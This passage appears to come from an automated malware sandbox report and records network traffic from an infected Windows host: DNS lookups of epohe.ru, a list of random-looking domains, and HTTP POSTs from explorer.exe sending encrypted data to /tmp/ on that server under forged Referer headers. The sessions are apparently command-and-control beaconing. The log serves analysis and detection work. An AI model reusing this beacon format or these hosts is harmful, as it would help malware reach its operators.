Sep 2, 2024 11:45:50.532964945 CEST	49788	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:50.538141966 CEST	80	49788	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:50.538254023 CEST	49788	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:50.538408995 CEST	49788	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:50.538423061 CEST	49788	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:50.543150902 CEST	80	49788	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:50.543234110 CEST	80	49788	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:51.472450018 CEST	80	49788	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:51.472518921 CEST	80	49788	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:51.472671032 CEST	49788	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:51.472779989 CEST	49788	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:51.477545977 CEST	80	49788	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:55.960916996 CEST	49789	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:56.310894012 CEST	80	49789	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:56.310973883 CEST	49789	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:56.311129093 CEST	49789	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:56.311152935 CEST	49789	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:56.315870047 CEST	80	49789	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:56.316037893 CEST	80	49789	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:57.212954998 CEST	80	49789	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:57.213695049 CEST	80	49789	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:57.213860035 CEST	49789	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:57.213860035 CEST	49789	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:57.218699932 CEST	80	49789	102.189.104.201	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 2, 2024 11:42:23.599831104 CEST	64046	53	192.168.2.4	1.1.1.1
Sep 2, 2024 11:42:24.606450081 CEST	64046	53	192.168.2.4	1.1.1.1
Sep 2, 2024 11:42:25.608670950 CEST	64046	53	192.168.2.4	1.1.1.1
Sep 2, 2024 11:42:27.622114897 CEST	64046	53	192.168.2.4	1.1.1.1
Sep 2, 2024 11:42:27.840945005 CEST	53	64046	1.1.1.1	192.168.2.4
Sep 2, 2024 11:42:27.840960026 CEST	53	64046	1.1.1.1	192.168.2.4
Sep 2, 2024 11:42:27.840969086 CEST	53	64046	1.1.1.1	192.168.2.4
Sep 2, 2024 11:42:27.840976000 CEST	53	64046	1.1.1.1	192.168.2.4
Sep 2, 2024 11:42:51.702620983 CEST	64724	53	192.168.2.4	1.1.1.1
Sep 2, 2024 11:42:52.167536020 CEST	53	64724	1.1.1.1	192.168.2.4
Sep 2, 2024 11:44:58.108985901 CEST	53089	53	192.168.2.4	1.1.1.1
Sep 2, 2024 11:44:59.122401953 CEST	53089	53	192.168.2.4	1.1.1.1
Sep 2, 2024 11:45:00.122211933 CEST	53089	53	192.168.2.4	1.1.1.1
Sep 2, 2024 11:45:02.138262987 CEST	53089	53	192.168.2.4	1.1.1.1
Sep 2, 2024 11:45:02.566879034 CEST	53	53089	1.1.1.1	192.168.2.4
Sep 2, 2024 11:45:02.566898108 CEST	53	53089	1.1.1.1	192.168.2.4
Sep 2, 2024 11:45:02.566909075 CEST	53	53089	1.1.1.1	192.168.2.4
Sep 2, 2024 11:45:02.566917896 CEST	53	53089	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 2, 2024 11:42:23.599831104 CEST	192.168.2.4	1.1.1.1	0xfea2	Standard query (0)	epohe.ru	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:24.606450081 CEST	192.168.2.4	1.1.1.1	0xfea2	Standard query (0)	epohe.ru	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:25.608670950 CEST	192.168.2.4	1.1.1.1	0xfea2	Standard query (0)	epohe.ru	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.622114897 CEST	192.168.2.4	1.1.1.1	0xfea2	Standard query (0)	epohe.ru	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:51.702620983 CEST	192.168.2.4	1.1.1.1	0xabde	Standard query (0)	www.darkviolet-alpaca-923878.hostingersite.com	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:44:58.108985901 CEST	192.168.2.4	1.1.1.1	0xed70	Standard query (0)	epohe.ru	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:44:59.122401953 CEST	192.168.2.4	1.1.1.1	0xed70	Standard query (0)	epohe.ru	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:00.122211933 CEST	192.168.2.4	1.1.1.1	0xed70	Standard query (0)	epohe.ru	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.138262987 CEST	192.168.2.4	1.1.1.1	0xed70	Standard query (0)	epohe.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 2, 2024 11:42:27.840945005 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		102.189.104.201	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840945005 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		92.36.226.66	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840945005 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		211.202.224.10	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840945005 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		211.253.81.39	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840945005 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		190.156.239.49	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840945005 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		93.103.167.123	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840945005 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		187.211.53.230	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840945005 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840945005 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		109.121.204.14	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840945005 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		197.164.156.210	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840960026 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		102.189.104.201	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840960026 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		92.36.226.66	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840960026 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		211.202.224.10	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840960026 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		211.253.81.39	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840960026 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		190.156.239.49	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840960026 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		93.103.167.123	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840960026 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		187.211.53.230	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840960026 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840960026 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		109.121.204.14	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840960026 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		197.164.156.210	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840969086 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		102.189.104.201	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840969086 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		92.36.226.66	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840969086 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		211.202.224.10	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840969086 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		211.253.81.39	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840969086 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		190.156.239.49	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840969086 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		93.103.167.123	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840969086 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		187.211.53.230	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840969086 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840969086 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		109.121.204.14	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840969086 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		197.164.156.210	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840976000 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		102.189.104.201	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840976000 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		92.36.226.66	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840976000 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		211.202.224.10	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840976000 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		211.253.81.39	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840976000 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		190.156.239.49	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840976000 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		93.103.167.123	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840976000 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		187.211.53.230	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840976000 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840976000 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		109.121.204.14	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:27.840976000 CEST	1.1.1.1	192.168.2.4	0xfea2	No error (0)	epohe.ru		197.164.156.210	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:42:52.167536020 CEST	1.1.1.1	192.168.2.4	0xabde	No error (0)	www.darkviolet-alpaca-923878.hostingersite.com	free.cdn.hstgr.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 2, 2024 11:42:52.167536020 CEST	1.1.1.1	192.168.2.4	0xabde	No error (0)	free.cdn.hstgr.net		191.96.144.157	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566879034 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		102.189.104.201	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566879034 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		92.36.226.66	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566879034 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		211.202.224.10	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566879034 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		211.253.81.39	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566879034 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		190.156.239.49	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566879034 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		93.103.167.123	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566879034 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		187.211.53.230	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566879034 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566879034 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		109.121.204.14	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566879034 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		197.164.156.210	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566898108 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		102.189.104.201	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566898108 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		92.36.226.66	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566898108 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		211.202.224.10	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566898108 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		211.253.81.39	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566898108 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		190.156.239.49	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566898108 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		93.103.167.123	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566898108 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		187.211.53.230	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566898108 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566898108 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		109.121.204.14	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566898108 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		197.164.156.210	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566909075 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		102.189.104.201	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566909075 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		92.36.226.66	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566909075 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		211.202.224.10	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566909075 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		211.253.81.39	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566909075 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		190.156.239.49	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566909075 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		93.103.167.123	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566909075 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		187.211.53.230	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566909075 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566909075 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		109.121.204.14	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566909075 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		197.164.156.210	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566917896 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		102.189.104.201	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566917896 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		92.36.226.66	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566917896 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		211.202.224.10	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566917896 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		211.253.81.39	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566917896 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		190.156.239.49	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566917896 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		93.103.167.123	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566917896 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		187.211.53.230	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566917896 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566917896 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		109.121.204.14	A (IP address)	IN (0x0001)	false
Sep 2, 2024 11:45:02.566917896 CEST	1.1.1.1	192.168.2.4	0xed70	No error (0)	epohe.ru		197.164.156.210	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.darkviolet-alpaca-923878.hostingersite.com

ynvnjwpyrjjaik.com

epohe.ru

rbwviinahwkfdp.net

nrvcprjhuix.org

paladqffwlsbfx.net

oerusfyadyvfpmjm.com

nbmnkedntct.net

esdminlvrkeqcklx.net

yrljtsnfbvqitue.org

wddxovmhfhdjjf.com

mroqivvlsgi.com

sloulillyitjtj.com

ldwswurfvgvwu.net

poatfeiydcmxgiom.org

mhwdtchfjlofmuv.org

dyovtuslfwnpfvr.net

agwwkiqfcegkjh.net

ivdbemhblrd.org

qsasppprtpxcq.com

iwrtbbnydhaevbhj.com

scammxgavejetg.org

jjpobfosorxh.com

tfebikfnyin.net

pkxpvxaevqgmdlaa.net

fprowwsvixkulpo.net

pwnffqufngll.com

sxaiuwdsglaywc.net

wuipisboawsvs.com

kvkvjbbqhfudfxqw.com

91.202.233.158

jedxkbbxtvyjefdy.net

mgxufuqrjem.com

jugejrjfmrsbqcyx.net

mgcnjvitwupuplla.com

veyluekclhthgug.net

xdpeyvjwjcxoduxb.com

ngmwxgboyrumd.org

dppdsmckyoiatanc.net

iunavucrkiocdvg.com

weelpnjtteeqb.net

mdaxajnxssfl.net

epvctlndxvceigyl.org

xbdxgcigtdnc.net

qhwbbbidikeuoya.org

ktmmebudltbr.org

psyhdeolvmp.net

ckgifyjrwgvlwluh.org

wtcwkmlaiuwf.net

asfcixluuutwn.org

jlbunmblotwunq.net

vfaiilfonqsqudx.org

qjqwiddoadvtn.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:27.847635984 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ynvnjwpyrjjaik.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 205 Host: epohe.ru
Sep 2, 2024 11:42:27.847656012 CEST	205	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 35 39 b3 fa Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vu59Jhzi2lO/aAo.<x>]Jo#0UQ\|+2D{YPI<WbI~I
Sep 2, 2024 11:42:29.123262882 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 86 ea Data Ascii: r
Sep 2, 2024 11:42:29.123296022 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 86 ea Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:29.131845951 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rbwviinahwkfdp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 300 Host: epohe.ru
Sep 2, 2024 11:42:29.131867886 CEST	300	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 5f 22 fa b9 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu_"axS_t2tL#40aos=(L"OU<(xE<1}_K;PSC>Fx ;u5~vCFZxJHF
Sep 2, 2024 11:42:30.049175024 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:29 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:30.063709021 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nrvcprjhuix.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 319 Host: epohe.ru
Sep 2, 2024 11:42:30.063725948 CEST	319	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 7d 47 e3 ae Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu}G%sMf~Qcow;at X0.@V[eV ;i`lEPCtmA)(O6 $hA)vXD
Sep 2, 2024 11:42:30.973990917 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:30 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:30.981873035 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://paladqffwlsbfx.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 287 Host: epohe.ru
